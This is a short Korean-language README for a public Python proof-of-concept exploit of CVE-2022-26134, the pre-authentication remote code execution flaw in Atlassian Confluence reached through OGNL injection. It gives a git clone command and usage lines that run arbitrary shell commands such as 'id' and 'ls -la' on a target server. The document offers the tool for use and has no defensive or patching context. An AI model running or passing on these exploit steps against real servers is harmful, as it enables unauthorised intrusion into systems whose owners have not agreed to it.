
CVE-2022-26134용 Python PoC 익스플로잇으로, Atlassian Confluence의 OGNL 인젝션을 통한 인증 전 원격 코드 실행 취약점입니다. 취약한 서버에서 임의의 명령을 실행합니다.
CVE-2022-26134 - Confluence 사전 인증 RCE | OGNL 인젝션
git clone https://github.com/crowsec-edtech/CVE-2022-26134
cd CVE-2022-26134
USE: python3 exploit.py https://target.com CMD
Ex: python3 exploit.py https://target.com id
Ex: python3 exploit.py https://target.com 'ls -la'